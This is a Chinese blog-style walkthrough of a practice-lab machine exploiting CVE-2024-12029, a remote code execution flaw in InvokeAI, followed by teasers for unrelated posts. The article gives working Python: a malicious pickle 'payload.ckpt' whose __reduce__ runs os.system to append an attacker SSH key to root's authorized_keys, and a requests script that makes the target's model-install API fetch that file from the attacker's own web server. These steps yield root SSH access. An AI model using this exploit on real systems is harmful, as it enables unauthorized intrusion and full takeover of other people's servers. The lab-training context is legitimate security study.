news 2026/5/14 15:15:32

InvokeAI远程代码执行漏洞实战演练:从漏洞发现到利用

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
InvokeAI远程代码执行漏洞实战演练:从漏洞发现到利用

InvokeAI_RCE | PG Walkthrough

搜索“invokeai_rce”,你很快就能找到CVE-2024-12029。事实证明,“huntr”是新的AI/ML CVE网站。

huntr - 世界上第一个AI/ML漏洞赏金平台
世界上第一个AI/ML漏洞赏金平台
世界上第一个AI/ML漏洞赏金平台
huntr.com^

基本上按照此链接中的概念验证进行操作。解决此靶机的主要技巧是找到该链接。

靶机的描述建议创建一个密钥,并使用载荷将id_rsa.pub上传到root用户的authorized_keys文件中。

首先,使用以下命令创建密钥:
ssh-keygen
复制id_rsa.pub,并将其用于ssh.py中的载荷。

使用ssh.py,如上文链接中的PoC所示,生成载荷。

ckpt文件将把公钥回显到目标机器的root用户的authorized_keys文件中。

importpickleclassPayload:def__reduce__(self):importosreturn(os.system,('echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA0mDlI9bbgZq0XYTKvG+jo/Q6/By7bxTP6VwRqs3sh1 root@kali" >> /root/.ssh/authorized_keys',))defgenerate_payload():# Not .pklwithopen('payload.ckpt','wb')asf:pickle.dump(Payload(),f)generate_payload()

在payload.ckpt所在位置设置一个Web服务器,并在exploit.py中引用它以执行载荷(将攻击者的id_rsa.pub公钥粘贴到目标的root用户authorized_keys文件中)。

importrequests url="http://192.168.159.218:9090/api/v2/models/install"params={"source":"http://192.168.45.227:8080/payload.ckpt","inplace":"true"}response=requests.post(url,params=params,json={})print(response.text)

确保为id_rsa文件赋予必要的权限(chmod 600 id_rsa),然后使用通过ssh-keygen生成的id_rsa密钥以root用户身份进行SSH连接。
CSD0tFqvECLokhw9aBeRqlyK5KMpaklojJBUegXcB9J+/111yYeGSJSiNtXQwSVQ0pW+HI2mbOG2VnyH8b7ErlJ21+8esbpf+7cQT5JJbS3PF4agwWGfdflw3pgF9XrX
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/9 16:30:53

现在购买GPU算力送HeyGem使用权?促销活动即将开启

购买GPU算力送HeyGem使用权?这波操作背后的AI生产力革命 在内容为王的时代,企业对视频制作的需求正以前所未有的速度增长。一场发布会、一次产品培训、一段课程讲解——这些场景背后是高昂的人力成本和漫长的制作周期。更别提当需要生成多语言版本时&…

作者头像 李华
网站建设 2026/5/9 18:27:46

cocotb 配合 iverilog 搭建 Verilog 仿真工程

参考 cocotb文档 iverilog 配合 Makefile 搭建 Verilog 仿真工程 ModelSim 配合 Makefile 搭建 Verilog 仿真工程 目录结构 tree /f D:. ├─rtl │ adder.v │ └─sim│ Makefile│ test_adder.py文件 rtl/adder.v module adder (input wire clk…

作者头像 李华
网站建设 2026/5/3 3:06:56

GPU租赁服务推荐:专为HeyGem等AI应用优化配置

GPU租赁服务推荐:专为HeyGem等AI应用优化配置 在短视频内容爆炸式增长的今天,企业对高效、低成本的视频生产工具需求日益迫切。无论是品牌宣传、在线课程,还是虚拟客服与数字人直播,自动化生成“口型同步”的虚拟人视频已成为提升…

作者头像 李华
网站建设 2026/5/1 8:51:59

HeyGem系统运行实时日志路径说明:/root/workspace/运行实时日志.log

HeyGem系统运行实时日志路径说明:/root/workspace/运行实时日志.log 在AI数字人技术从实验室走向规模化落地的今天,系统的稳定性与可维护性正变得和模型精度一样重要。HeyGem作为一款基于大模型驱动的口型同步视频生成工具,面对的是教育、客服…

作者头像 李华
网站建设 2026/5/13 23:58:59

Three.js三维引擎无关?HeyGem聚焦二维视频合成

HeyGem:当数字人不再需要Three.js 在AI内容生产如火如荼的今天,我们常常被“3D建模”“实时渲染”“骨骼绑定”这类术语包围。仿佛没有一个强大的图形引擎,就做不了像样的数字人。但现实是,大多数企业并不需要电影级特效——他们只…

作者头像 李华
网站建设 2026/5/2 12:55:46

学生党如何体验?申请免费Token试用HeyGem基础功能

学生党如何体验?申请免费Token试用HeyGem基础功能 在短视频与AI内容创作全面爆发的今天,越来越多的学生开始尝试用技术手段制作课程汇报、项目展示甚至自媒体内容。但真人出镜拍摄耗时费力,剪辑门槛也不低;而市面上一些数字人工具…

作者头像 李华